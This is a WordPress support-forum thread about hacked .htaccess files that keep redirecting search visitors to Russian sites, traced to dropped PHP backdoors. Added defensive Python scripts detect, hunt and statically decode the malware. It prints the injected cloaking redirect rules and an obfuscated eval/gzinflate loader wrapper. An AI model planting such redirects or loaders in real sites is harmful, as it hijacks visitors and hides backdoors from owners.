
.htaccess Hacked, Redirects to Russian Site (30 posts)

  1. ramirez_fabian
    Member
    Posted 2 years ago #

    I updated all sites to the recent WordPress 3.3.1

    Here is the code that keeps redirecting to a Russian site. I delete it and it just reappears. I changed passwords in WordPress and changed my hosting password. Still it keeps appearing. Anyone know how to get rid of it, or what plugin is causing this entry of hack?

    Code in .htaccess

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
    RewriteRule ^(.*)$ http://[ link redacted ] [R=301,L]
    RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
    RewriteRule ^(.*)$ http://[ link redacted ] [R=301,L]
    </IfModule>
    
    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>
    
    # END WordPress
    
    ErrorDocument 400 http://[ link redacted ]
    ErrorDocument 401 http://[ link redacted ]
    ErrorDocument 403 http://[ link redacted ]
    ErrorDocument 404 http://[ link redacted ]
    ErrorDocument 500 http://[ link redacted ]
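The two injected parts of the file above work differently: the RewriteCond/RewriteRule pairs only fire when the Referer header names a search engine or social site, so the owner typing the URL in directly never sees the redirect (cloaking), while ErrorDocument with an absolute URL makes Apache answer every listed error with a redirect to that URL. The following triage script is an added example, not code from this thread or from WordPress. It assumes the file layout shown above: a stock "# BEGIN WordPress ... # END WordPress" block and injected directives outside it. The sample .htaccess is constructed to mirror the posted one, with "http://example.invalid/" standing in for the redacted .ru target and the search-engine list cut short.

```python
"""Triage a WordPress .htaccess for injected off-site redirects.
Added example; the sample file below is constructed, not the posted one."""
import re
from urllib.parse import urlparse

SAMPLE_HTACCESS = """\
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|yandex|rambler)\\.(.*)
RewriteRule ^(.*)$ http://example.invalid/ [R=301,L]
</IfModule>

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

ErrorDocument 404 http://example.invalid/
ErrorDocument 500 http://example.invalid/
"""

# The block WordPress writes for pretty permalinks; a clean file holds this and nothing else.
STOCK_WORDPRESS_BLOCK = SAMPLE_HTACCESS[
    SAMPLE_HTACCESS.index("# BEGIN WordPress"):
    SAMPLE_HTACCESS.index("# END WordPress") + len("# END WordPress")] + "\n"


def is_external(target, site_host):
    """True when a RewriteRule/ErrorDocument target is an absolute URL on another host.
    (ErrorDocument with an absolute URL makes Apache redirect instead of serving a page.)"""
    if not re.match(r"https?://", target, re.I):
        return False
    try:
        host = (urlparse(target).hostname or "").lower()
    except ValueError:            # unparsable host: treat as hostile
        return True
    return host != site_host.lower()


def triage_htaccess(text, site_host):
    """Return [(line_no, reason)] for directives outside the WordPress block
    that send visitors somewhere else."""
    findings, in_wp, referer_cond = [], False, False
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if line == "# BEGIN WordPress":
            in_wp = True
        if in_wp:
            in_wp = line != "# END WordPress"
            continue
        tok = line.split()
        directive = tok[0].lower() if tok else ""
        if directive == "rewritecond":
            if "%{HTTP_REFERER}" in line:
                referer_cond = True
                findings.append((no, "RewriteCond keyed on HTTP_REFERER: cloaked, "
                                     "only search/social visitors get redirected"))
        elif directive == "rewriterule" and len(tok) >= 3:
            if referer_cond or is_external(tok[2], site_host):
                findings.append((no, f"RewriteRule sends requests to {tok[2]}"))
            referer_cond = False      # a RewriteRule consumes the conds before it
        elif directive == "errordocument" and len(tok) >= 3 and is_external(tok[2], site_host):
            findings.append((no, f"ErrorDocument {tok[1]} redirects error pages to {tok[2]}"))
    return findings


def only_stock_block(text):
    """True when nothing but the WordPress block (and blank lines) is present."""
    outside = re.sub(r"# BEGIN WordPress.*?# END WordPress", "", text, flags=re.S)
    return outside.strip() == ""


if __name__ == "__main__":
    for no, why in triage_htaccess(SAMPLE_HTACCESS, "example.com"):
        print(f"line {no}: {why}")
    print("stock block only:", only_stock_block(STOCK_WORDPRESS_BLOCK))
```

Run it against every .htaccess in the account (the thread mentions copies above public_html too), and once the dropper is gone, replace each file with the stock block rather than hand-editing the injected one.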
  2. Jan Dembowski

    > Here is the code that keeps redirecting to a Russian site. I delete it and it just reappears.

    Sure. That's just treating the symptoms and is the equivalent of playing whack-a-mole.

    > Anyone know how to get rid of it, or what plugin is causing this entry of hack?

    This topic comes up a lot so please forgive me as I recycle a verbose version from here.

    You've a lot of work and reading ahead of you. You have already made a great start with the password changes; if you haven't already, give these a read.

    Backup everything and put that somewhere safe off of your server. This is your safety net.

    http://codex.wordpress.org/WordPress_Backups
    http://codex.wordpress.org/Backing_Up_Your_Database
    http://codex.wordpress.org/Restoring_Your_Database_From_Backup

    Once that's safely put away, give these a read.

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    When possible, you'll need to replace all of your files with good ones from the source. Once you've reached the Happy Place™ consider doing this.

    http://codex.wordpress.org/Hardening_WordPress

    It will make automated updates a manual thing (locking down the file system), but until you're confident the site is secure that's probably not a bad thing. When you're convinced it's all good, then you can relax the file system restrictions back to normal.

    Good luck.

  3. RMelick
    Member
    Posted 2 years ago #

    Same thing going on over here - wordpress.org/support/topic/htaccess-hacked-redirects-to-russion-site?replies=2

  4. ramirez_fabian
    Member
    Posted 2 years ago #

    I've asked my hosting company (bluehost) to assist with determining the entry point and how to prevent it, but they cannot find this information out. We've backed up my files and restored but the .htaccess files keep getting infected with Russian code.

    It all happens at the same time, like 7:50am this morning: every .htaccess file was changed and code inserted, then it sets the permissions to 444.

    I'm really getting annoyed by this.

  5. bh_WP_fan
    Member
    Posted 2 years ago #

    This isn't going to just go away by fixing your .htaccess and doing a little bit of cleanup work each time. You'll need to take some real cleanup and security and prevention measures.

    It will probably take some time to go over it and apply it, but it's better than wasting more and more time dealing with the hack over and over again.

    Go over the information Jan Dembowski provided for you.

    Remove any and all plugins/themes that you can possibly afford to get rid of. I had an instance where an insecurity placed a vulnerability in an otherwise secure WP Super Cache, and then I had to clean that up as well. But trying to track it is difficult... Just remove anything you can afford to get rid of, and make sure everything else is up to date with the latest versions. (Don't just deactivate themes/plugins... actually delete them.)

    Re-upload all the core WordPress files, and do the same for your theme (if un-edited manually) and for your plugins, and replace the current files with the core files so any vulnerable files will be replaced.

    Read: https://my.bluehost.com/cgi/help/511

    And, again, read the information sent above.

  6. ramirez_fabian
    Member
    Posted 2 years ago #

    I logged into Bluehost, did a search on my hosting directory for thumb.php and timthumb.php.

    Looks like 5 of my sites had the thumb.php file and each one needed to be updated. I installed the timthumb vulnerability plugin on each site, and it automatically installed the most recent thumb.php file. So each site is up to date on that file as well as on the most recent version of WordPress.

    The .htaccess was then hacked again.

    I found this article to be helpful

    http://www.hacksparrow.com/wordpress-hacked-getting-forwarded-to-distributioncorporate-ru-solution.html

    The article says this:

    Delete these files:
    /wp-content/uploads/_wp_cache.php
    /wp-content/uploads/sm3.php

    I did a search of sm3.php, and found no results. However when I did a search of _wp_cache.php, I found one file on one of the sites that had a thumb.php file that needed to be updated.

    I quickly deleted that file as the article mentioned, and so far so good. Now I'm going to go to each .htaccess file and delete the extra code and see if this does the trick.

    Fingers crossed on this one.

  7. ramirez_fabian
    Member
    Posted 2 years ago #

    The hack is back a day later with a different Russian site now. I'm not going to give up, although I want to. I have about 20 sites running via Bluehost. I just want to find the javascript or point of entry.

    My .htaccess are all changed at the same time today 5:04am. So this is an automatic script hitting my sites. Really bummed!

  8. lucaslshaffer
    Member
    Posted 2 years ago #

    Looking at the same issue.

    Subscribing to follow thread.

  9. lucaslshaffer
    Member
    Posted 2 years ago #

    Found this.

    http://wordpress.org/support/topic/recurring-htaccess-hijack?replies=30

    "This same thing has been affecting 50+ sites in my hosting account for the last two days.

    The domains I have are a combination of WP, Joomla and simply hosted domains. They were all affected the same.

    I finally figured out how this was happening... In my case 3 of my WordPress installs were infected by a file either called wp_cache.php or simply _chache.php (as suggested by docarzt). For me they were located in wp-content/uploads/

    After I found and deleted all foreign files, and replaced the infected htaccess files, all went back to normal.

    It's been a several hours since an injection so I think I'm in the clear. Before, the files were getting infected again between 15-30 minutes.

    Hope this helps."

  10. lucaslshaffer
    Member
    Posted 2 years ago #

    Ok, found _cache.php in the uploads folder in the last site on my hosting. (go figure)

    Going to replace htaccess files and CHMOD them.

  11. ramirez_fabian
    Member
    Posted 2 years ago #

    > CHMOD them.

    What does CHMOD them mean?

  12. CHMOD means change mode. It's a Unix thing.

  13. ramirez_fabian
    Member
    Posted 2 years ago #

    > Ok, found _cache.php in the uploads folder in the last site on my hosting. (go figure)

    I too just found this same file, so I deleted it. It was on the last site that I installed on my hosting. The theme uses the thumb.php within the theme, but I installed the recent thumb.php file.

  14. garylnunn
    Member
    Posted 2 years ago #

    I've also been fighting this problem for days, and thanks to the above posts, I also found the files wp_cache.php and _cache.php in my wp-uploads directory. Of course they're both encrypted.

    I still want to know how they got there, and just as importantly, exactly which one of the scripts was calling those files?

  15. thecrow76
    Member
    Posted 2 years ago #

    Hi. Well, we use logic: if I set permissions on a file, 644 or 444, it should be possible to modify it or delete it. This is not happening in this case. The .htaccess file is modified regardless of the permissions.
    1 - is it a hack that attacks WP?
    2 - is it a hack that attacks Apache?

    For me it is a security issue at the PHP/Apache level, caused by WP or plugins.

    Can we analyze this case further all together?

    Sorry, my English is very bad.
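The permission question raised in the post above has a concrete answer: on shared hosting the dropped PHP file runs as the same account that owns the site files, so mode 444 on .htaccess is no obstacle to it. The owner can chmod the file back, and because unlink needs write permission on the directory rather than on the file, it can also delete a read-only file and recreate it. The following demonstration is an added example, not code from the thread; it works on a constructed temporary file and assumes it is run as an ordinary (non-root) user, as a hosting account would be.

```python
"""Show that chmod 444 does not protect a file from its own owner.
Added example; uses a constructed temp file."""
import os
import tempfile


def readonly_bypass(content=b"# injected\n"):
    """Return (direct_write_blocked, rewritten_after_chmod, recreated_after_unlink).
    The first flag is True for a normal user and False for root; the other two
    are True either way, which is the point."""
    d = tempfile.mkdtemp()
    path = os.path.join(d, ".htaccess")
    with open(path, "wb") as f:
        f.write(b"# clean\n")
    os.chmod(path, 0o444)

    # 1. A plain write to a 0444 file is refused for a non-root owner...
    try:
        with open(path, "wb") as f:
            f.write(content)
        blocked = False
    except PermissionError:
        blocked = True

    # 2. ...but the owner may simply change the mode and write anyway.
    os.chmod(path, 0o644)
    with open(path, "wb") as f:
        f.write(content)
    with open(path, "rb") as f:
        rewritten = f.read() == content

    # 3. Even with 0444 restored, a writable directory lets the file be
    #    replaced outright: unlink is a directory operation.
    os.chmod(path, 0o444)
    os.unlink(path)
    with open(path, "wb") as f:
        f.write(content)
    with open(path, "rb") as f:
        recreated = f.read() == content
    return blocked, rewritten, recreated


if __name__ == "__main__":
    print(readonly_bypass())
```

What does change the outcome is a different owner: files owned by an account the PHP process cannot write as (the "locking down the file system" step in the Hardening WordPress page linked above), which most shared hosts do not offer. Until then the only fix is removing the script that does the writing.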

  16. Shadal
    Member
    Posted 2 years ago #

    For me, I found a strange looking WP-SYS.PHP file in the root directory of one of my wordpress 3.3.1 sites. I am/was getting ALL of my sites htaccess files modified, pointing to a .ru site. I've just deleted the file about 10 mins ago, so am hoping the hack has been stopped.

    Hope this works! Thanks for the info...

  17. wpvince
    Member
    Posted 2 years ago #

    Did anyone find a solution?
    Thanks

  18. wpvince
    Member
    Posted 2 years ago #

    I was also told that putting the following line into htaccess would help
    RewriteRule \.ht[ap] - [NC,F]
    Thanks

  19. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    > Did anyone find a solution?

    Scroll up and read Jan Dembowski's post.

  20. wpvince
    Member
    Posted 2 years ago #

    @kmessinger I did, but this is not a WordPress-specific issue, and I was looking for the cause rather than just recovering after the problem.

    It seems everyone is at a loss right now as to how to stop it happening again.
    http://forum.joomla.org/viewtopic.php?f=432&t=705216&start=60#p2778501

  21. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    > I was looking for the cause

    There is always a way to get in if someone wants to badly enough. Right now the shared servers most of us use makes it a lot easier.

    The war against hackers won't be won unless companies change the way they use computer networks. UPDATED with a comment provided by the FBI. http://www.tomsguide.com/us/Hackers-FBI-Shawn-Henry-Anonymous-LulzSec,news-14627.html

    http://codex.wordpress.org/Hardening_WordPress will help. Good karma will help.

  22. tommcgee
    Member
    Posted 1 year ago #

    Be sure to look up and down ALL the directories in your hosting. I found random .php files in several places in my directory tree, far away from where my WordPress installation was.

    Look for PHP files with strange names. Look for PHP files where they don't belong -- in directories by themselves, in image directories, in directories full of HTML files, with your error pages.

    Look at the modification dates especially. Sort the files in each directory by modification date. Chances are you'll see suspicious files modified in the last week or two in places where you know you weren't working.

    Wherever they are, they can go off and rewrite your .htaccess files.
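The hunt described in the post above can be scripted. The following is an added example, not code from the thread; the heuristics (PHP under uploads, a PHP at the WordPress root that is not a core file, a lone PHP among images or HTML, consonant-soup names like the ones reported in this thread, and recent modification) are assumptions chosen to match what people here found, not WordPress rules. The list of root files is what WordPress 3.x ships; regenerate it from a clean download of your version. The directory tree it scans is constructed inside the block so the script runs offline.

```python
"""Hunt for PHP files that do not belong in a WordPress tree.
Added example; heuristics are assumptions, sample tree is constructed."""
import os
import re
import tempfile
import time
from pathlib import Path

# Files WordPress 3.x ships at the install root. Anything else ending in
# .php at that level (including case variants such as Index.php) is suspect.
KNOWN_ROOT = {
    "index.php", "wp-activate.php", "wp-app.php", "wp-blog-header.php",
    "wp-comments-post.php", "wp-config.php", "wp-config-sample.php",
    "wp-cron.php", "wp-links-opml.php", "wp-load.php", "wp-login.php",
    "wp-mail.php", "wp-pass.php", "wp-register.php", "wp-settings.php",
    "wp-signup.php", "wp-trackback.php", "xmlrpc.php",
}
STATIC_EXT = {".jpg", ".jpeg", ".png", ".gif", ".html", ".htm", ".css", ".js", ".txt"}
RARE = set("qxzjv")   # letters that rarely occur in real theme/plugin names


def looks_random(component):
    """Cheap heuristic for names like zreqgigkqvt or wp-xgqdi (assumption)."""
    stem = component.lower()
    stem = stem[:-4] if stem.endswith(".php") else stem
    stem = stem[3:] if stem.startswith("wp-") else stem   # droppers borrow the wp- prefix
    if len(stem) < 5 or not stem.isalpha():
        return False
    score = sum(c in RARE for c in stem)
    score += bool(re.search(r"[^aeiou]{4}", stem))                  # four consonants in a row
    score += sum(c in "aeiou" for c in stem) / len(stem) < 0.25     # too few vowels
    return score >= 2


def hunt(root, recent_days=14, now=None):
    """Return {relative_path: [reasons]} for every suspicious .php file."""
    root = Path(root)
    now = time.time() if now is None else now
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = Path(dirpath).relative_to(root)
        php = [f for f in files if f.lower().endswith(".php")]
        others = [f for f in files if not f.lower().endswith(".php")]
        static_only = bool(others) and all(Path(f).suffix.lower() in STATIC_EXT for f in others)
        for f in php:
            reasons = []
            if "uploads" in rel_dir.parts:
                reasons.append("php-in-uploads")
            if not rel_dir.parts and f not in KNOWN_ROOT:
                reasons.append("unexpected-root-php")
            if static_only:
                reasons.append("lone-php-among-static-files")
            if any(looks_random(p) for p in (*rel_dir.parts, f)):
                reasons.append("random-looking-name")
            age = (now - (Path(dirpath) / f).stat().st_mtime) / 86400
            if age <= recent_days:
                reasons.append(f"modified-{age:.0f}d-ago")
            if reasons:
                found[(rel_dir / f).as_posix()] = reasons
    return found


def build_sample_tree(root, now=None):
    """Constructed tree: a normal install plus the drops reported in this thread
    (_cache.php in uploads, a random plugin dir, wp-xgqdi.php beside images,
    Index.php at the root). Legitimate files are 90 days old, drops 1 day."""
    now = time.time() if now is None else now
    old, fresh = now - 90 * 86400, now - 86400
    files = {
        "index.php": old, "wp-login.php": old, "wp-config.php": old, "Index.php": fresh,
        "wp-content/themes/twentyeleven/functions.php": old,
        "wp-content/themes/twentyeleven/thumb.php": old,
        "wp-content/plugins/akismet/akismet.php": old,
        "wp-content/uploads/2012/01/photo.jpg": old,
        "wp-content/uploads/_cache.php": fresh,
        "wp-content/plugins/zreqgigkqvt/edw.php": fresh,
        "images/logo.png": old, "images/wp-xgqdi.php": fresh,
    }
    for rel, mtime in files.items():
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text("placeholder\n")
        os.utime(p, (mtime, mtime))


def run_demo():
    root = tempfile.mkdtemp()
    build_sample_tree(root)
    return hunt(root)


if __name__ == "__main__":
    for path, why in sorted(run_demo().items()):
        print(path, ",".join(why))
```

Point hunt() at the top of the hosting account, not just one WordPress directory, since several posters found the dropper outside the install they were looking at. After a WordPress update, set recent_days to the days since that update or every refreshed core file will show up with only the modification reason.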

  23. Piyush Labs
    Member
    Posted 1 year ago #

    Both /mylogin/.htaccess and /mylogin/public_html/.htaccess get modified, redirecting to random .ru websites.

    How did I miss this post? I was searching all around for the solution.
    Now I found the wp-content\upload\_cache.php file with encrypted code and did some research.

    <?php
    preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'
    .......
    '\x29\x29\x20\x29\x20\x3b",".");?>

    It decodes to

    <?php
    preg_replace("/.*/e","eval ( gzinflate ( base64_decode ('
    ........
    ')) ) ;",".");?>

    Running it on the server, you can see it in action: a real backdoor.
    This is just "one" example; there are many out there, with names other than "_cache.php", all due to this thumb.php lying there in one of my old inactive themes.

    Tired of this hack, which I have been facing for the last 3 months, though there was no problem in viewing the site. I finally erased everything last night, and now I am rebuilding it again, after my site got black-listed in Google search. :(
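The loader shown in the post above relies on two things: the /e modifier of preg_replace, which makes PHP evaluate the replacement string as code (the modifier was removed in PHP 7), and hex escapes that hide the eval(gzinflate(base64_decode(...))) chain from a plain grep. The replacement can be decoded without executing it, layer by layer: resolve the PHP string escapes, then base64-decode and raw-inflate (what gzinflate does) the quoted payload, and repeat while the result is another known wrapper. The script below is an added example, not code from the thread. The payload it decodes is constructed, because the thread elides the real one; the hex prefix and suffix are the ones posted.

```python
"""Statically peel a preg_replace('/e') + eval(gzinflate(base64_decode())) loader.
Added example; the sample loader is constructed around the posted wrapper bytes."""
import base64
import re
import zlib

# PHP double-quoted string escapes: \xNN, octal \NNN, and the simple ones.
_ESC = re.compile(r'\\(x[0-9A-Fa-f]{1,2}|[0-7]{1,3}|[nrtvfe\\"$])')
_SIMPLE = {"n": "\n", "r": "\r", "t": "\t", "v": "\v", "f": "\f", "e": "\x1b",
           "\\": "\\", '"': '"', "$": "$"}


def php_unescape(s):
    """Resolve PHP double-quoted string escapes the way the interpreter would."""
    def one(m):
        t = m.group(1)
        if t[0] == "x":
            return chr(int(t[1:], 16))
        if t[0] in "01234567":
            return chr(int(t, 8))
        return _SIMPLE[t]
    return _ESC.sub(one, s)


# preg_replace(<pattern>, "<double-quoted replacement>", ...) as posted.
PREG_E = re.compile(r'preg_replace\s*\(\s*["\']([^"\']*)["\']\s*,\s*"((?:[^"\\]|\\.)*)"', re.S)
CHAIN = re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=\s]*)'")


def has_e_modifier(pattern):
    """'/.*/e' -> True: modifiers follow the closing delimiter."""
    if not pattern:
        return False
    delim = pattern[0]
    return "e" in pattern[pattern.rfind(delim) + 1:]


def peel(src, max_depth=8):
    """Return the decoded layers, outermost first; stop at any unknown wrapper."""
    layers = [src]
    for _ in range(max_depth):
        cur = layers[-1]
        m = PREG_E.search(cur)
        if m and has_e_modifier(m.group(1)):
            layers.append(php_unescape(m.group(2)))      # the string /e would eval
            continue
        m = CHAIN.search(cur)
        if m:
            try:   # gzinflate == raw DEFLATE, hence wbits -15
                layers.append(zlib.decompress(base64.b64decode(m.group(1)), -15).decode("latin-1"))
            except (ValueError, zlib.error):
                break
            continue
        break
    return layers


def _gzdeflate(data):
    """Raw DEFLATE without zlib header, matching PHP's gzdeflate()."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def _php_hex(s):
    return "".join("\\x%02x" % ord(ch) for ch in s)


# Constructed payload and loader in the same shape as the posted file:
# hex-escaped wrapper, plain base64 between single quotes.
INNER_STAGE = "<?php /* constructed innermost stage: INNERMOST_STAGE */ ?>"
_B64 = base64.b64encode(_gzdeflate(INNER_STAGE.encode())).decode()
SAMPLE_LOADER = ('<?php\npreg_replace("/.*/e","' + _php_hex("eval ( gzinflate ( base64_decode (")
                 + "'" + _B64 + "'" + _php_hex(")) ) ;") + '",".");?>')

if __name__ == "__main__":
    for i, layer in enumerate(peel(SAMPLE_LOADER)):
        print(f"--- layer {i} ---\n{layer[:120]}")
```

On a real sample the innermost layer is the actual dropper; read it rather than run it, since that is where the .htaccess-writing logic, and often a second copy of the loader under a new name, will be.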

  24. thoughton
    Member
    Posted 1 year ago #

    I encountered a very similar problem today. My .htaccess file looks very similar to the OP's.

    In my case there were no _cache.php files, but there was a mystery folder (named 'zreqgigkqvt') in the wp-content/plugins folder. This folder does not show up in the WordPress plugin list. Contents include edw.php and gsm.php, which contain PhpShel-G and PHPShell-A trojans respectively. It also contains several other random-character-name folders, all of which contain edw.php and lists of words to target (viagra, cialis, etc).

    edw.php also contains references to mx.hotmail.com and port 25.

  25. kozmic
    Member
    Posted 1 year ago #

    I found the same problem today. 1: the .htaccess looked nearly like the one from ramirez_fabian above; 2: there was a second index.php, called Index.php.
    3: I deleted all, but one hour later the .htaccess was once more corrupted; then I found a file ".000_cache.php" in the upload folder. Since I deleted this it works, but some security software still does not let people onto my site.

    Excuse my bad english.

  26. boyhermes
    Member
    Posted 1 year ago #

    I had the same problem with the .htaccess files.

    I found the file _cache.php and I erased it. Also, I erased all the .htaccess files and replaced them with new empty ones.

    the problem was solved.

    It's better to erase all the data and install a fresh wordpress copy.

  27. Eddieman
    Member
    Posted 1 year ago #

    I recently started a WordPress site and now I find I'm getting emails warning me my site has a 'registered new user'. In fact, I'm getting dozens of these advisory emails, and when I log on to my site I find I've got hundreds of posts for other sites/products.
    1 - How can I block these people's access to my site?
    2 - I have found several usernames listed on the log-in menu, but only my password.
    3 - How can I stop my password from automatically coming up as soon as I select my listed username?

    Help! Please as I fear losing my site completely to all this SPAM stuff or someone smarter than me taking control of my domain and locking me out or doing something illegal.
    Eddieman.

  28. adesender
    Member
    Posted 1 year ago #

    I've been having the same issue as this for the last while as well. However, in my case I wasn't able to locate any problematic files in the uploads. In the situation of my client I found code in the cgi folder off root, named 'wp-xgqdi.php'.

    I've deleted the file, cleaned up the .htaccess files and notified Google of the resolution. I'll post in here if my issue is resolved.

  29. mortensn
    Member
    Posted 1 year ago #

    I found a _cache.php file hidden on my hosting account (Bluehost) on a site I haven't touched in over a year. Deleted the file and everything seems to be okay so far. (It's been 2 hours).

  30. adesender
    Member
    Posted 1 year ago #

    Just following up. Been a week since I removed the file and it is still clean.

Topic Closed

This topic has been closed to new replies.
